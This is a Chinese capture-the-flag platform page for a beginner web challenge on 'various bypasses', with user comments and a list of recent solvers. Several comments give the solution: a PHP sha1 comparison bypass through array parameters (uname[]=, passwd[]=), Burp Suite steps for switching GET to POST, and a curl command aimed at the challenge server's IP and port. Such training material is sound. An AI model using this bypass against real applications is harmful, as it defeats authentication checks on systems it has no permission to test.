各种绕过哟WEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: jiangdie666
一血奖励: 2金币
解  决: 4099
提  示:
描  述:
各种绕过
评论
zhuizhui 6天前

POST /?id=margin&uname[]=1 passwd[]=11 数组绕过sha-1

回复 0

ahsjezyt 9天前

flag{********}

回复 0

奕生 29天前

bp可以,就是要把GET请求改成POST请求

回复 0

xlogsrc 1月前

curl -X POST "http://117.72.52.127:11657/?uname[]=a&id=margin" -d "passwd[]=b"

回复 0

liuguowang75 3月前

passwd[]=2无法提交,最终还是用python脚本解决了,两次这样子了

回复 1
theo1234 2月前

请问die终止了执行,python脚本还能获得结果吗

回复 0

liuguowang75 3月前

要触发输出 flag,可以通过构造如下请求: GET id=margin,uname[]=1 POST passwd[]=2

回复 0

featherwit001 3月前

sha1数组绕过,使用bp没有问题,需要GET和POST同时传参, 先url/?id=margin&uname[]=1 用bp劫持 然后修改报文 GET 变为 POST。在报文末尾添加: Content-Type: application/x-www-form-urlencoded (空行)passwd[]=2

回复 1
Ksumrng 11天前

使用bp从get改到post需要注意,在报文末尾添加: Content-Type: application/x-www-form-urlencoded。或者改好post数据后鼠标点一下数据包内容右边的post数据项或header,bp就可以自动添加content-type

回复 0

HK1ng 3月前

sha1绕过和md5绕过方式相同

回复 0

2726123464 3月前

flag{******} 看源代码被蒙了,不对欸

回复 0

smtall 4月前

还是得用hackbar

回复 0

WriteUp

image
harry

3 金币

评分(3)

解题动态

ahco 攻破了该题 19小时前
Hehe0619 攻破了该题 1天前
afanda 攻破了该题 2天前
yphyph 攻破了该题 2天前
bugkuctfmike6 攻破了该题 3天前
实力这块/.手拿把掐 攻破了该题 3天前
小白ctf 攻破了该题 3天前
人闲桂花落 攻破了该题 3天前
dwx1583 攻破了该题 4天前
maguaa 攻破了该题 4天前
2595151702 攻破了该题 4天前
hua1232 攻破了该题 4天前
CCY011037 攻破了该题 5天前
luyisie 攻破了该题 6天前
xianyu520 攻破了该题 6天前
zhuizhui 攻破了该题 6天前
Qzmlgfj 攻破了该题 7天前
maomaoht 攻破了该题 7天前
zengzhijing 攻破了该题 7天前
xiaocaomoji 攻破了该题 7天前
问题反馈